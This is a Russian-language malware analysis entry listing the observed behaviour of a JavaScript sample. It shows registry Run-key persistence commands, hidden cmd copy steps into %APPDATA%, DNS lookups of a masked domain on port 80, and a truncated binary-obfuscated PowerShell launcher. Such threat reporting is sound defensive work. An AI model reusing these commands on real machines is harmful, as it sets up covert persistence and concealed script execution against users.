Техническая информация
- [<HKCU>\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] 'lol' = '%APPDATA%\<Имя файла>.js'
- %APPDATA%\<Имя файла>.js
- 'gr####ayindia.com':80
- DNS ASK google.com
- DNS ASK gr####ayindia.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' $gf=(01100100,01101111,00100000,01111011,00100100,01110000,01101001,01101110,01100111,00100000,00111101,00100000,01110100,01100101,01110011,01110100,00101101,01100011,01101111,01101110,01101110...' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "lol" /t REG_SZ /F /D "%APPDATA%\<Имя файла>.js"' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c copy "<PATH_SAMPLE>.js" "%APPDATA%\" /Y' (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' $gf=(01100100,01101111,00100000,01111011,00100100,01110000,01101001,01101110,01100111,00100000,00111101,00100000,01110100,01100101,01110011,01110100,00101101,01100011,01101111,01101110,01101110...
- '<SYSTEM32>\cmd.exe' /c REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "lol" /t REG_SZ /F /D "%APPDATA%\<Имя файла>.js"
- '<SYSTEM32>\cmd.exe' /c copy "<PATH_SAMPLE>.js" "%APPDATA%\" /Y
- '<SYSTEM32>\reg.exe' ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "lol" /t REG_SZ /F /D "%APPDATA%\<Имя файла>.js"
- '%WINDIR%\syswow64\notepad.exe'